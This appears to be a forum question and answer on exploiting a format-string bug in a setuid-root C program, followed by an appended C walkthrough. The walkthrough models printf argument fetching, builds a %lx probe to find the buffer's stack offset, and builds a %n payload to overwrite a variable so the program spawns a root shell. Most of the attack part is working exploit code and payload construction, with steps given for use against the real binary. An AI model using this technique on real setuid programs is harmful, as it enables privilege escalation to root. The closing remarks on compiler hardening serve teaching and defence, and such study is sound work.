
How can I perform a “printf string attack” using a buffer overflow?

The code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Reached only if the_var has been changed: spawns a shell. */
void doit()
{
    system("/bin/sh");
    exit(0);
}

int main(int argc, char **argv)
{
    static int the_var;     /* lives in .data/.bss, not in the stack frame */
    char buf[512];

    the_var = 20;

    strncpy (buf, argv[1], sizeof(buf) - 1);

    printf (buf);           /* user-controlled format string */

    if (the_var != 20)
    {
        doit();
    } else {
        printf ("\nthe_var @ 0x%08x = %d 0x%08x\n", &the_var, the_var, the_var);
    }
}

The program is running with the sticky bit (owner uid 0); all I have to do is crack it and run /bin/sh as root.

I know how to crack the program with, e.g., a buffer overflow and strcpy (shellcode), but I don't know how to use a 'format string attack' on this one.

As you can see, there is a var the_var; if it is not equal to 50 then the shell is run (maybe try to change it somehow, some dirty magic?). Anyway, there is a printf (buf).

You control buf. Pass %x format strings to dump the stack and %n to overwrite the object the_var in the stack. In your program, if the object the_var is overwritten, the doit function will be called and /bin/sh will be executed.
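Worked example, added here and not part of the question or the answer above: a self-contained C model of the two steps the answer describes. printf takes its "arguments" from the caller's frame, and buf is in that frame, so the bytes of argv[1] become arguments. The model_printf below fakes that fetch over a constructed word array instead of calling glibc, so the offsets are fixed by assumption (buf starting at argument 7, a 64-bit little-endian target, the 8-byte address slot kept at byte 32 of the payload) and the code runs anywhere. Step 1 is the %x dump: probe with "%N$lx" for rising N until a marker placed in the address slot comes back. Step 2 puts &the_var in that slot and sends "%1$<count>c%N$n", so %n stores a chosen character count through the pointer. the_var itself is static, so what goes on the stack is its address; the program's own else branch prints that address on a first run.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The target from the question: 20 unless the attacker changes it. */
static int the_var = 20;

/* Model of printf's argument fetching (assumption: mimics glibc in spirit,
 * it is not glibc).  Each conversion takes a word from `stack`; %N$ picks
 * word N.  Supports %x/%lx and %c with a width, and %n, which stores the
 * count of characters emitted so far through the pointer in the chosen word. */
static long model_printf(char *out, size_t outsz, const char *fmt,
                         const uintptr_t *stack, int nwords)
{
    long count = 0; int next = 0; size_t o = 0;
#define EMIT(ch) do { if (o + 1 < outsz) out[o++] = (ch); count++; } while (0)
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') { EMIT(*p); continue; }
        if (*++p == '%') { EMIT('%'); continue; }
        long num = 0, width = 0; int have = 0, idx = -1;
        while (*p >= '0' && *p <= '9') { num = num * 10 + (*p - '0'); p++; have = 1; }
        if (*p == '$') {                       /* positional: %N$[width]conv */
            idx = (int)num - 1; p++; num = 0; have = 0;
            while (*p >= '0' && *p <= '9') { num = num * 10 + (*p - '0'); p++; have = 1; }
        }
        if (have) width = num;
        if (*p == 'l') p++;
        if (idx < 0) idx = next++;
        if (idx >= nwords) return -1;          /* walked off the fake stack */
        uintptr_t word = stack[idx];
        char tmp[32]; int n;
        switch (*p) {
        case 'x':
            n = snprintf(tmp, sizeof tmp, "%llx", (unsigned long long)word);
            for (long i = n; i < width; i++) EMIT(' ');
            for (int i = 0; i < n; i++) EMIT(tmp[i]);
            break;
        case 'c':                              /* width-1 spaces + one char */
            for (long i = 1; i < width; i++) EMIT(' ');
            EMIT((char)word);
            break;
        case 'n':                              /* the write primitive */
            *(int *)word = (int)count;
            break;
        default:
            return -1;
        }
    }
    if (outsz) out[o] = '\0';
    return count;
#undef EMIT
}

/* Assumptions: buf's first word is printf argument 7; the payload keeps its
 * 8-byte address slot at byte 32 so probe and exploit land on the same word. */
enum { NWORDS = 24, BUF_WORD = 6, ADDR_OFF = 32 };

/* What strncpy did in the question: argv[1] copied into buf inside the frame.
 * Words 0..5 are constructed junk standing in for the rest of the frame. */
static void load_frame(uintptr_t *stack, const char *payload, size_t len)
{
    for (int i = 0; i < NWORDS; i++) stack[i] = 0xdead0041u + (uintptr_t)i;
    size_t room = (NWORDS - BUF_WORD) * sizeof *stack;
    memcpy(&stack[BUF_WORD], payload, len < room ? len : room);
}

/* Build argv[1]: directives, space padding to ADDR_OFF, then the 8-byte word.
 * The word goes last because a 64-bit address has NUL high bytes: the C string
 * ends there and strncpy's zero padding supplies the rest of the word. */
static size_t build(char *payload, const char *directives, uint64_t word)
{
    size_t n = strlen(directives);
    if (n > ADDR_OFF) return 0;
    memcpy(payload, directives, n);
    memset(payload + n, ' ', ADDR_OFF - n);
    memcpy(payload + ADDR_OFF, &word, sizeof word);
    payload[ADDR_OFF + 8] = '\0';
    return ADDR_OFF + 8;
}

/* Step 1, the %x dump: probe "%N$lx" until the marker word is printed back. */
static int find_position(void)
{
    char payload[48], dirs[16], out[512];
    uintptr_t stack[NWORDS];
    for (int pos = 1; pos <= NWORDS; pos++) {
        snprintf(dirs, sizeof dirs, "%%%d$lx", pos);
        size_t len = build(payload, dirs, 0x4141414141414141ULL);
        load_frame(stack, payload, len);
        if (model_printf(out, sizeof out, payload, stack, NWORDS) > 0 &&
            strstr(out, "4141414141414141"))
            return pos;
    }
    return -1;
}

/* Step 2: &the_var replaces the marker; "%1$<want>c" emits exactly `want`
 * characters and "%<pos>$n" stores that count through the pointer. */
static int exploit(int pos, int want)
{
    char payload[48], dirs[32], out[512];
    uintptr_t stack[NWORDS];
    snprintf(dirs, sizeof dirs, "%%1$%dc%%%d$n", want, pos);
    size_t len = build(payload, dirs, (uint64_t)(uintptr_t)&the_var);
    load_frame(stack, payload, len);
    if (model_printf(out, sizeof out, payload, stack, NWORDS) < 0) return -1;
    return the_var;   /* still 20 means the write missed; anything else calls doit() */
}

int main(void)
{
    int pos = find_position();
    printf("address slot is argument %d\nthe_var = %d\n", pos, exploit(pos, 1337));
    return 0;
}
```

Against the real binary the two steps are two runs: once with the probe as argv[1] to read the dump, once with the final payload, using the_var's address from the program's own output. Builds with -D_FORTIFY_SOURCE=2 abort with "%n in writable segment detected" when the format string is in writable memory, and -Wformat-security flags printf(buf) at compile time, so the same source hardened by a modern toolchain does not fall to this.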
